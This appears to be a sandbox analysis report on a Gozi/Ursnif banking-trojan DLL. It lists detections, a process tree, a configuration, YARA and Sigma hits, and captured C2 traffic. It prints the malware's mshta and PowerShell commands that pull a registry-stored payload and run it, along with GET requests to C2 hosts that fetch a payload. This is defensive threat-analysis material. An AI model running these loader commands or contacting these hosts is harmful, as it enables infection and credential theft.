Loading ...

Play interactive tourEdit tour

Analysis Report earmarkavchd

Overview

General Information

Sample Name:earmarkavchd (renamed file extension from none to dll)
Analysis ID:321067
MD5:78b3444199a2932805d85cfdb30ad6fb
SHA1:a1826a8bdd4aa6fc0bf2157a6063cca5534a3a46
SHA256:66eaf5c2bc2ec2a01d74db9cc50744c748388cd9b0fa1f07181e639e128803ef

Most interesting Screenshot:

Detection

Gozi Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected Gozi e-Banking trojan
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a COM Internet Explorer object
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to steal Mail credentials (via file access)
Uses nslookup.exe to query domains
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 4396 cmdline: loaddll32.exe 'C:\Users\user\Desktop\earmarkavchd.dll' MD5: 62442CB29236B024E992A556DA72B97A)
    • control.exe (PID: 6996 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 5504 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\6110.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 4740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • nslookup.exe (PID: 7088 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
        • cmd.exe (PID: 2072 cmdline: cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\6110.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • iexplore.exe (PID: 3884 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5928 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3884 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6328 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3884 CREDAT:17416 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6788 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3884 CREDAT:82964 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 7064 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 7164 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5352 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6548 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47A8.tmp' 'c:\Users\user\AppData\Local\Temp\l4vfe2li\CSC4DA260FDB3A0492587313FAF41D3B261.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6916 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\3he3buld\3he3buld.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6980 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5D63.tmp' 'c:\Users\user\AppData\Local\Temp\3he3buld\CSCBE830862A12C4DC4815ABE234EBA2CD.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_0_x64", "version": "250157", "uptime": "126", "system": "4ccebe99a7438fb71ee5005fa7d4ea12hh", "size": "200775", "crc": "2", "action": "00000000", "id": "2200", "time": "1605897653", "user": "1082ab698695dc15e71ab15c9ed3ab41", "hash": "0xc0ebb23d", "soft": "3"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.271745722.00000000037B8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.271874843.00000000037B8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000000.00000003.271783751.00000000037B8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          0000001A.00000002.406330368.000000000020E000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 23 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Dot net compiler compiles file from suspicious locationShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7164, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline', ProcessId: 5352
            Sigma detected: MSHTA Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 7064, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 7164
            Sigma detected: Suspicious Csc.exe Source File FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7164, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline', ProcessId: 5352

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus / Scanner detection for submitted sampleShow sources
            Source: earmarkavchd.dllAvira: detected
            Found malware configurationShow sources
            Source: loaddll32.exe.4396.0.memstrMalware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_0_x64", "version": "250157", "uptime": "126", "system": "4ccebe99a7438fb71ee5005fa7d4ea12hh", "size": "200775", "crc": "2", "action": "00000000", "id": "2200", "time": "1605897653", "user": "1082ab698695dc15e71ab15c9ed3ab41", "hash": "0xc0ebb23d", "soft": "3"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: earmarkavchd.dllReversingLabs: Detection: 45%
            Machine Learning detection for sampleShow sources
            Source: earmarkavchd.dllJoe Sandbox ML: detected
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02828A61 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_02828A61
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02826E86 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,0_2_02826E86
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02813DEE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,0_2_02813DEE
            Source: C:\Windows\explorer.exeCode function: 29_2_03B791A0 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,29_2_03B791A0
            Source: C:\Windows\explorer.exeCode function: 29_2_03B537B8 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,29_2_03B537B8
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02831C05 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,0_2_02831C05

            Networking:

            barindex
            Creates a COM Internet Explorer objectShow sources
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Found Tor onion addressShow sources
            Source: loaddll32.exe, 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmpString found in binary or memory: wADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: loaddll32.exe, 00000000.00000003.340776035.0000000002850000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: powershell.exe, 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: control.exe, 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: explorer.exe, 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: RuntimeBroker.exe, 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Source: RuntimeBroker.exe, 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
            Uses nslookup.exe to query domainsShow sources
            Source: unknownProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
            Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
            Source: Joe Sandbox ViewIP Address: 47.241.19.44 47.241.19.44
            Source: global trafficHTTP traffic detected: GET /api1/eo_2BIlYIakkFjtKlYh34Ss/HzB35UuLk7/cRenSoj_2Bmnd8Dj2/x181tJXN27RB/cqhJWTWpoyc/WU_2BHDqXNQHyF/aDmY5Jw7iTMS8Sm28wuKE/aE7o1rgRq9Zga98a/Lfk5mVpEscNl_2B/PEL_2BzPSrlVxe7hjg/VwIhIVlrD/Q75QLCo1R_2FGgXCAPcg/a82_2BpHTzLUJRE2skc/NrjfTQynui55314yUu2IJ7/NuVMlNbXu5eLz/t14q6jvB/NktWJXjAjAGBXHfWPm_0A_0/DDQhZDtGQu/HIp9aDbbcUD_2FJMS/dglTkO1jgRVp8/MzuzdPBBs/X HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/XO7QtVtOxvAU4dkxK/MUnrl2paNhM_/2FhuHDAlai0/NYk3fgMRD21K6x/275eVNVSoFX1z_2Fdgzow/MjYIlNw6pXOFZtoH/ck22OsEBi4g5A21/99QRfbFqCod1fjkNsK/XxVSIrdVG/7FHa2ER9Ft02LqAkeU18/04NkD5rjB5JZqGFdQLM/maVmTCXIlwp0EX02aBt_2F/Clo4eegFdQ1lk/P1pW4ZJ5/wIbd6IdM2um9GQiRmu4HTYW/_2FpOuqNYz/HTi5jYJ7JeAd_0A_0/Dg9X8gZJHmh_/2B_2FHgF5eg/hemqUNvmE05Kam/e7yAaZ9rb60RXTZYuOS2q/HQUlA_2F4Fhmtp/3js HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/6pQLMKxXX9R7A/0Kb9p8K4/BHJoVof6Fq7pyt4TOfPymNR/ZySC71MXSL/l8MLURonpjSVljDCJ/ih2L1Bdz8irJ/_2F8lSRByE0/SM6_2BP71LZESU/h3tJD1hVHbKiwkwE2IeWs/IizA7p6En4mCz2WA/NXpt5f6m6Jvf3pc/Mrs5oQ_2FPRoyih4jN/nKDhf733I/JOO4yWaqPLDk_2FATWs4/au98UO6brkA9iK_2BJ2/m2zSLNazAj56j867SYe4xl/cUNEATTbA9T6H/G_0A_0DY/h1e_2Bl0ZjLJIZf95sH7_2B/vbmm46cNio/kWkp8HAde3SsZyg36/ZN_2BmnjrWTcHtn/70R8a3b9 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
            Source: global trafficHTTP traffic detected: GET /api1/y593T41s/lL3TOAWpr8BAEirizPVY1nr/gHh_2FJm75/zCdiX47c4HpAxyRkT/qHLmarlSHot9/ONkJbY9gGOt/fQ6HQhMd_2B2I2/UNHWo1YbKowVIMWnTVz3S/Fy9pHKfmC1MflrBD/0HEKH0eANuLLaQi/NyVaE39P8WW680xE9C/zKHHHrqp_/2BtcUAWB7_2BpbaOT4FO/b_2BpTr1WFjW1cxH4os/NuSvnY4dMHLhOh3P7AJ4TT/NndN5S4150t5l/lDv81A2q/V_2FLzQ_2B_0A_0D_2B1i_2/FVUx_2B8Aw/gTJkpEcUGFJt7Exz1/ugevcO8oI6oRZ/xs5xjc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Host: api3.lepini.at
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
            Source: unknownDNS traffic detected: queries for: api10.laptok.at
